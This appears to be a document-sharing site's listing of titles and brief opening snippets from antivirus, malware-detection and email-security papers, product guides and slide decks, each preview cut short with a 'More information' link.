Very Fast Containment of Scanning Worms Nicholas Weaver, Stuart Staniford, Vern Paxson ICSI, Nevis Networks, ICSI & LBNL 1 Outline Worm Containment Scan Suppression Hardware Implementation Cooperation
More informationKaspersky PURE 2.0. Mail Anti-Virus: security levels
Mail Anti-Virus: security levels Content Mail Anti-Virus. Security levels... 2 Operation algorithm of Mail Anti-Virus... 2 Security levels of Mail Anti-Virus... 2 Customizing security level... 4 Creating
More information1, NEWS REVIEWS FEATURES OPINIONS HOW-TOs FORUM PHOTOS VIDE SPECIALS
NEWS REVIEWS FEATURES OPINIONS HOW-TOs FORUM PHOTOS VIDE SPECIALS MOBILE PHONES TABLETS NOTEBOOKS GRAPHICS CARDS GAMING CAMERAS HDTVS DOCK REVIEWS / MAC OS / ESCAN (MICROWORLD SOFTWARE SERVICES PVT. LTD.)
More informationAntivirus Technology
Antivirus Technology CSH6 Chapter 41 Antivirus Technology Chey Cobb & Allysa Myers 1 Copyright 2015 M. E. Kabay. All rights reserved. Topics AV Terminology AV Issues History of Viral Changes Antivirus
More informationTrend Micro Deep Discovery for Education. Identify and mitigate APTs and other security issues before they corrupt databases or steal sensitive data
Trend Micro Deep Discovery for Education Identify and mitigate APTs and other security issues before they corrupt databases or steal sensitive data 1 Computers, the Internet, and portable devices are now
More informationHow To Remove Live Security Platinum Virus Using Mcafee
How To Remove Live Security Platinum Virus Using Mcafee This article helps you determine what to do if you discover or suspect a virus For current information about viruses and threats, always use the
More informationHow to Predict Viruses Under Uncertainty
How to Predict Email Viruses Under Uncertainty InSeon Yoo and Ulrich Ultes-Nitsche Department of Informatics, University of Fribourg, Chemin du Musee 3, Fribourg, CH-1700, Switzerland. phone: +41 (0)26
More informationAnti-Virus. Anti-Virus Scanning Overview. This chapter contains the following sections:
This chapter contains the following sections: Scanning Overview, page 1 Sophos Filtering, page 2 McAfee Filtering, page 4 How to Configure the Appliance to Scan for Viruses, page 6 Sending an Email to
More informationHow to Identify Advanced Persistent, Targeted Malware Threats with Multidimensional Analysis
White paper How to Identify Advanced Persistent, Targeted Malware Threats with Multidimensional Analysis AhnLab, Inc. Table of Contents Introduction... 1 Multidimensional Analysis... 1 Cloud-based Analysis...
More informationExample 1 Root Cause Analysis Report Focal Point: Loss of Productivity
Report Number: RCA 2012.430 Report Date: 04/30/2012 RCA Owner: Problem Management Problem Statement Example 1 Root Cause Analysis Report Focal Point: Loss of Productivity Focal Point Loss of Productivity
More informationArtificial Intelligence Methods invirus Detection & Recognition
Artificial Intelligence Methods in Virus Detection & Recognition Introduction to heuristic scanning Wojciech Podgórski http://podgorski.wordpress.com October 16, 2008 Presentation outline 1 Introduction
More informationManually Update Kaspersky Virus Removal Tool
Manually Update Kaspersky Virus Removal Tool Database Obsolete Kaspersky Removal Tool 2015 contains articles on how to install, activate, and use "This version is obsolete" message in Kaspersky Virus Removal
More informationBase64 The Security Killer
Base64 The Security Killer Kevin Fiscus NWN Corporation Session ID: DAS-203 Session Classification: Intermediate A Short (Made Up) Security Story Helix Pharmaceuticals is concerned about security Industrial
More informationNetDefend Firewall UTM Services
NetDefend Firewall UTM Services Unified Threat Management D-Link NetDefend UTM firewalls (DFL-260/860/1660/2560/2560G) integrate an Intrusion Prevention System (IPS), gateway AntiVirus (AV), and Web Content
More informationTurn On Windows Defender Windows 8.1 This App Has Been Turned Off
Turn On Windows Defender Windows 8.1 This App Has Been Turned Off It comes built into Windows Vista, Windows 7, Windows 8 and Windows 8.1. Windows. Mar 12, 2015. Windows Defender: "the app has been turned
More informationHow To Remove Xp Internet Security 2011 Virus Manually
How To Remove Xp Internet Security 2011 Virus Manually Contact your anti-malware vendor for assistance with identifying or removing virus or worm infections. If you need more help with malware removal
More informationUP L13: Leveraging the full protection of SEP 12.1.x
UP L13: Leveraging the full protection of SEP 12.1.x Hands on lab Description In this hands on lab you will learn about the different protection technologies bundled in SEP 12.1.x and see how they complement
More informationNorton Internet Security 2012 Removal Tool For Windows 7
Norton Internet Security 2012 Removal Tool For Windows 7 Norton Removal Tool 22.5.0.4 - A program that can remove the majority of Symantec from your computer including Norton Antivirus, Ghost or Internet
More informationPrevent and Detect Malware with Symantec Advanced Threat Protection: Network
WHITE PAPER: SYMANTEC ADVANCED THREAT PROTECTION........................................ Prevent and Detect Malware with Symantec Advanced Threat Protection: Network Who should read this paper This white
More informationManaging SonicWall Gateway Anti Virus Service
Managing SonicWall Gateway Anti Virus Service SonicWall Gateway Anti-Virus (GAV) delivers real-time virus protection directly on the SonicWall security appliance by using SonicWall s IPS-Deep Packet Inspection
More informationReal Security. In Real Time. White Paper. Preemptive Malware Protection through Outbreak Detection
Real Security. In Real Time. White Paper Preemptive Malware Protection through Detection Table of Contents Executive Summary...2 Response Time to New s The Achilles Heel of the Anti-Virus Industry...3
More informationAnti-Virus Testing and AMTSO
Anti-Virus Testing and AMTSO Patrik Runald, Security Response Manager Helsinki Kuala Lumpur San Jose Tokyo London Paris Milan Hong Kong Mumbay Warsaw Munich Copenhagen Brussels Oulu Utrecht Oslo Stockholm
More informationF-PROT Antivirus Engine performance analysis
F-PROT Antivirus Engine performance analysis By FRISK Software International For partners FRISK Software International FRISK Software International More than 20 years experience in the antivirus business
More informationCopyright 2004 ESET. ESET reserves the right to change any of the described application modules without prior notice.
Copyright 2004 ESET All rights reserved. No part of this publication may be reproduced, stored in a retrieval system or transmitted in any form or by any means, electronic, mechanical, photocopying, recording,
More informationANTIVIRUS SITE PROTECTION (by SiteGuarding.com)
ANTIVIRUS SITE PROTECTION (by SiteGuarding.com) USER GUIDE Version 0.1.0 1 Table of content 1. INTRODUCTION. 3 2. HOW IT WORKS.... 6 3. HOW TO CONFIGURE.. 7 2 1. INTRODUCTION Antivirus Site Protection
More informationPolymorphic Worm Detection Using Structural Information of Executables
Polymorphic Worm Detection Using Structural Information of Executables Christopher Kruegel 1,EnginKirda 1, Darren Mutz 2, William Robertson 2, and Giovanni Vigna 2 1 Technical University of Vienna chris@auto.tuwien.ac.at,
More informationThe State of Endpoint Security: Past, Present and Future WHITE PAPER
The State of Endpoint Security: Past, Present and Future WHITE PAPER Is Malware Winning? It does not look like things are getting better in the world of cybersecurity powerful ransomware, breaches affecting
More informationExam : Title : symantec small Business security. Version : DEMO
Exam : 250-101 Title : symantec small Business security Version : DEMO 1. Which heuristic technology does Symantec AntiVirus use? A. Q-Factor B. Bloodhound C. pattern matching D. regular expression 2.
More informationProtection FAQs
Email Protection FAQs Table of Contents Email Protection FAQs... 3 General Information... 3 Which University email domains are configured to use Email Protection for Anti-Spam?... 3 What if I am still
More informationGFI product comparison: GFI MailEssentials vs. Barracuda Spam Firewall
GFI product comparison: GFI MailEssentials vs. Barracuda Spam Firewall Features GFI MailEssentials Barracuda Spam Firewall Integrates with Microsoft Exchange Server 2007/2010/2013 Scans incoming and outgoing
More informationCannot Uninstall Mcafee Agent Because Other
Cannot Uninstall Mcafee Agent Because Other Products Are Using It Is there a tool or a command line to manually uninstall the agent deployed by beta EPO 5.2? via Programs and Features using the default
More informationConfiguring Antivirus Devices
CHAPTER 9 Revised: November 11, 2007 Antivirus (AV) devices provide detection and prevention against known viruses and anomalies. This chapter describes how to configure and add the following devices and
More informationThe WildList is Dead, Long Live the WildList!
The WildList is Dead, Long Live the WildList! Andreas Marx, Frank Dessmann AV-Test GmbH, Magdeburg, Germany http://www.av-test.org Presented at the Virus Bulletin 2007 Conference in Vienna, Austria http://www.virusbtn.com/conference/vb2007
More informationCommtouch Messaging Security for Hosting Providers
Commtouch Messaging Security for Hosting Providers September 2009 nospam@commtouch.com www.commtouch.com blog.commtouch.com About Commtouch Since 1991 NASDAQ: CTCH Profitable Double digit growth Over 100
More information